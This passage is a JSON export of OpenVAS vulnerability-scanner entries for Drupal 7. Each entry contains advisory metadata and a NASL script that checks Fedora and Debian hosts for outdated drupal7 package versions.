Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure.
{"openvas": [{"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-82df33e428", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875498", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875498\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-07 04:16:17 +0100 (Thu, 07 Mar 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-82df33e428\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-82df33e428\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSOCWBFM4P67FW6Q7VWMJUVBGDWNNURQ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal7' package(s) announced via the FEDORA-2019-82df33e428 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.64~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-18023f40fa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875344", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_18023f40fa_drupal7_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-18023f40fa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875344\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:38:57 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-18023f40fa\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-18023f40fa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EV4RZIREFWKABPNE6QLBRMUZOKCTPEP7\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2018-18023f40fa advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.60~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-2fbce03df3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2019-6341", "CVE-2012-2922"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875532", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875532", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875532\");\n script_version(\"2019-04-03T06:51:48+0000\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:48 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:48 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-2fbce03df3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2fbce03df3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y4SVTVIJ33XCFQ6X6XTVMQM3NPLP2WFS\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-2fbce03df3 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.65~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:17", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-05-09T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-f563e66380", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876331", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876331\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-11358\", \"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-09 02:13:20 +0000 (Thu, 09 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-f563e66380\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-f563e66380\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal7' package(s) announced via the FEDORA-2019-f563e66380 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features,\n Drupal is a Content Management System written in PHP that can support a variety\n of websites ranging from personal weblogs to large community-driven websites.\n Drupal is highly configurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.66~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-05T01:40:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-26T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-41d6ffd6f0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7602", "CVE-2019-11831", "CVE-2012-2922"], "modified": "2019-05-31T00:00:00", "id": "OPENVAS:1361412562310876417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876417", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876417\");\n script_version(\"2019-05-31T13:18:49+0000\");\n script_cve_id(\"CVE-2019-11831\", \"CVE-2019-11358\", \"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-31 13:18:49 +0000 (Fri, 31 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-26 02:12:18 +0000 (Sun, 26 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-41d6ffd6f0\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-41d6ffd6f0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z246UWBXBEKTQUDTLRJTC7XYBIO4IBE4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-41d6ffd6f0 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.67~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:09:10", "description": "remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.", "cvss3": {}, "published": "2018-04-27T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1365-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891365", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891365", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891365\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7602\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1365-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-27 00:00:00 +0200 (Fri, 27 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u19\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:43", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4180-1 (drupal7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4180-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704180\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7602\");\n script_name(\"Debian Security Advisory DSA 4180-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 00:00:00 +0200 (Wed, 25 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4180.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:52:08", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-2872", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:865431", "href": "http://plugins.openvas.org/nasl.php?oid=865431", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-2872\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099673.html\");\n script_id(865431);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:16:43 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-2872\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-2872\");\n\n script_summary(\"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.20~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-03T10:58:27", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2012-06-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2012-8360", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:864276", "href": 